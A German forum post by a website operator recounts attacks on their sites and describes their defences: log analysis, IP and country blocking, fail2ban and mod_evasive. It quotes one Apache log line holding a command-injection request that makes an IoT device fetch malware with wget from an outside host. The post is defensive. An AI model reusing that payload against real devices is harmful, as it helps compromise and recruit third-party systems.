Was wäre denn sinnvollerweise als "heftig" anzusehen? Ich meine, Abuse-Meldungen sollen ja ein scharfes Schwert bleiben, und nicht durch Kleinkram stumpf werden.

1. Heftig ist es für mich vor allem, wenn es Dritte betrifft.

HTTP-Requests (Apache-logfile:)

xxx.xxx.xxx.xxx - - [14/Jan/2020:04:16:16 +0000] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7;" 400 0 "-" "-" 

Das ist ein Versuch so ein stark fehlerhaftes IoT-Dingens dazu zu bewegen, Schadsoftware aus dem Web zu laden. „switchnet.net“ hostete offenbar nur diese und ähnliche Schadsoftware und ging nach meinem fundierten Hinweis (mit Virenscan der Datei „hoho.arm7“) vom Netz. Merkwürdigerweise kommen immer noch solche Requests. Offenbar waren die Hacker teils erfolgreich. Die anonymsierte IP stammt meist von DSL- oder Kabelanschlüssen.

2. Heftig war es auch, als in Vor-DSL-Zeiten ein Trottel mit Nessus auf meinem Mailformular herumhackte und ich dann 2000 sinnlose Mails bekam. Ich habe damals immerhin gelernt, wie man in einer Bash eine for-Schleife schreibt und 2000 Mails via POP3-Protokoll löscht...

3. Nicht heftig war hingegen der Angriff des „größten Full-Service-Dienstleister in NRW“, weil bei dem außer der Schnauze gar nicht groß ist. Insbesonders an Hirn mangelte es den Burschen - die benutzten a) die eigene statische IP und versuchten ein Kommentarformular anzugreifen. Kommentare lässt sich ja niemand nach Hause schicken und die werden stets gleich veröffentlicht… Da half auch kein Abuse, aber das Amtsgericht Düsseldorf mit einer einstweiligen Verfügung. (52 C 15528/10)

4. Heftiger war die echte DDoS-Attacke anno 2008, den ich auf die Bande um den früheren „Abmahnanwalt“ GvG zurückführe. Kriminelle Kreise halt.

Damals habe ich allerdings gelernt, dass es bei solchen Angreifern mit viel Geld aber sehr stark begrenzten geistigen Ressourcen völlig ausreicht seinen Webkram a) schlank zu halten und b) serverseitig zu cachen. Das Cachen habe ich richtig gut im Griff.

Getestet wird das Vorhandensein bestimmter Ordner zB von Wordpress-Installationen. … ist jedenfalls nicht "zufällig" von einem unbeabsichtigt schlecht programmierten Rechner losgetreten worden.

Das, was Du da zeigts habe ich auch, der steuernde Client (benutzt wird dann wget oder curl, der „UserAgent“ in den Headern ist „gefälscht“) wird wohl in den meisten Fällen Nessus sein. Dieses Sicherheitstool, welches Admins beim Erkennen von Problemen auf den eigenen Servern helfen soll, wird nämlich auch von Kriminellen genutzt. Eben um Lücken zu finden.

Und das ist das interessante:

Ich lasse alle 404er (Not Found) durch ein sehr schnelles Skript analysieren, ob es einer der bekannten Tests oder ein unwillkommener Bot ist. Wenn das zutrifft und die IP oder der Hostname des Clints nicht auf einer Sperrliste (Google, Bing, ...) steht, dann gehts es ab nach .htaccess (beim Hoster) oder in die Firewall (@home).

Was jetzt die Rechenzentren betrifft, die sperre ich dennoch komplett. Ich sehe nicht viel Grund für einen Rechner in einem Rechenzentrum, meine Webseiten abholen zu wollen. Und die IPs, die irgend eine API-Ressouce bei mir lesen - naja die kenne ich. China? Vietnam? Fullblock! Denn kein Chinese interessiert sich ernsthaft für meinen Kram.

Wer jetzt Gast in einer der ganz wenigen Einrichtungen ist, die bei einem bestimmten WLAN-Anbieter kaufte (der nach eigenem Bekunden ebenfalls vom ersten Tag an „der größte“ war - was im Hinblick auf Besitzer und Geschäftsführer der Düsseldorfer GmbH nicht wundert (siehe oben), der hat eben Pech wenn seine Zugriffe über das sehr bulgarische „Rechenzentrum“ in einem Plovdiver Geschäftshaus laufen und kann meine Webseiten dann eben auch nicht sehen.

Den Rest killt fail2ban nebst mod_evasive. Wenn es schlimmer kommen sollte, dann kümmern sich die Hoster oder Internetprovider darum und unterbinden das Routing bzw. Level-3-Switching. Die zahlen nämlich auch den Traffic.

Wenn die Logs wieder überschaubarer werden (weil die ellenlangen Listen nicht mehr so viele Kalender-Aufrufe durch die bots aufweisen),

Oh. Naja. Ich habe zwar nur den grünen Gürtel, halte mich aber sicherlich nicht ganz grundlos für einen guten Benutzer von schlanken und schnellen Tools wie grep, cut, wc, awk und Pipes… PHP macht dann nur noch den kleinen Rest - Die angebene Zeit ist die Gesamtzeit, das Zeug rennt auf einem Raspi.